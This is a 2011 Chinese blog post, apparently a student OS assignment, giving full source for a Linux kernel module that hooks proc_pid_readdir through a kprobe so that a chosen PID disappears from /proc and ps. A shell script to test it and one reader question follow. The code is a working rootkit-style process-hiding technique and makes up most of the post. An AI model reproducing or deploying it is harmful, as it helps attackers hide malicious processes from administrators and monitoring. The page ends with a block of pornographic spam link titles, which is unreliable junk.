• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>

            糯米

            TI DaVinci, gstreamer, ffmpeg
            隨筆 - 167, 文章 - 0, 評(píng)論 - 47, 引用 - 0
            數(shù)據(jù)加載中……

            Linux內(nèi)核通過(guò)inline hook實(shí)現(xiàn)隱藏進(jìn)程

            這是我們操作系統(tǒng)的大作業(yè)。
            原理就是inline hook 那個(gè) proc 文件系統(tǒng),根目錄下的 readdir 的函數(shù)。
            替換掉第三個(gè)參數(shù),filldir。
            代碼爆短,60來(lái)行。
            Ubuntu 10.04 測(cè)試可用。

            #include <linux/kernel.h>
            #include 
            <linux/kprobes.h>
            #include 
            <linux/module.h>
            #include 
            <linux/moduleparam.h>
            #include 
            <linux/fs.h>

            int register_kprobe(struct kprobe *kp);

            static struct kprobe kp = {
                .symbol_name    
            = "proc_pid_readdir",
            }
            ;

            static filldir_t old_filldir;
            static int pid;

            module_param(pid, 
            int0744);

            static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
                       u64 ino, unsigned 
            int d_type)
            {
                
            int p;
                sscanf(name, 
            "%d"&p);
                
            if (p == pid)
                    
            return 0;
                
            return old_filldir(__buf, name, namlen, offset, ino, d_type);
            }



            /* kprobe pre_handler: called just before the probed instruction is executed */
            static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
            {
                old_filldir 
            = (filldir_t)regs->cx;
                regs
            ->cx = (typeof(regs->cx))filldir;
                
            return 0;
            }


            static int __init k_init(void)
            {
                
            int ret;

                kp.pre_handler 
            = handler_pre;

                ret 
            = register_kprobe(&kp);
                
            if (ret < 0{
                    printk(KERN_INFO 
            "register_kprobe failed, returned %d\n", ret);
                    
            return ret;
                }

                printk(KERN_INFO 
            "Planted kprobe at %p; pid %d\n", kp.addr, pid);

                
            return 0;
            }


            static void __exit k_exit(void)
            {
                unregister_kprobe(
            &kp);
                printk(KERN_INFO 
            "kprobe at %p unregistered\n", kp.addr);
            }


            module_init(k_init);
            module_exit(k_exit);
            MODULE_LICENSE(
            "GPL");



            sleep 1000 &
            pid
            =`jobs -p`
            echo 
            'before hide'
            ps aux 
            | grep $pid
            insmod k.ko pid
            =$pid
            echo 
            'after hide'
            ps aux 
            | grep $pid
            rmmod k.ko
            echo 
            'after unhide'
            ps aux 
            | grep $pid

            posted on 2011-02-23 14:58 糯米 閱讀(2276) 評(píng)論(1)  編輯 收藏 引用 所屬分類: Linux

            評(píng)論

            # re: Linux內(nèi)核通過(guò)inline hook實(shí)現(xiàn)隱藏進(jìn)程  回復(fù)  更多評(píng)論   

            handler_pre() 函數(shù)中為什么 regs->cx 修改為hook函數(shù)就能執(zhí)行hook之后的函數(shù)?

            我使用同樣的方式修改這個(gè)內(nèi)核函數(shù) usb_alloc_dev,然而regs->cx存放的并不是有效地地址,是0x00000001
            2011-12-22 18:31 | quietjolt
            亚洲精品NV久久久久久久久久| 色综合久久中文字幕综合网| 亚洲综合伊人久久大杳蕉| 亚洲精品无码久久不卡| 久久国产精品无| 亚洲国产精品无码久久九九| 综合人妻久久一区二区精品| 99久久国产亚洲高清观看2024 | 欧美亚洲国产精品久久高清| 97久久国产综合精品女不卡| 精品久久久久久无码中文野结衣| 久久婷婷五月综合97色一本一本| 国产成人精品综合久久久久| 久久天堂电影网| 97精品伊人久久大香线蕉app| 久久无码中文字幕东京热| 99热都是精品久久久久久| 久久久久99精品成人片三人毛片 | 久久久久亚洲av毛片大| 99久久国产主播综合精品| 久久精品国产久精国产一老狼| 一本色综合久久| 国产精品内射久久久久欢欢| 久久99精品国产自在现线小黄鸭| 久久亚洲AV成人无码电影| 亚洲午夜无码AV毛片久久| 久久精品国产亚洲Aⅴ蜜臀色欲| 97久久精品无码一区二区 | 欧美激情精品久久久久| 高清免费久久午夜精品| 97久久超碰国产精品旧版| 久久久久亚洲AV无码永不| 日韩精品久久久久久| 97精品伊人久久大香线蕉app| 精品国产乱码久久久久久1区2区 | 无码人妻精品一区二区三区久久| 久久亚洲中文字幕精品有坂深雪| 影音先锋女人AV鲁色资源网久久| 中文无码久久精品| 成人资源影音先锋久久资源网| 久久精品国产亚洲麻豆|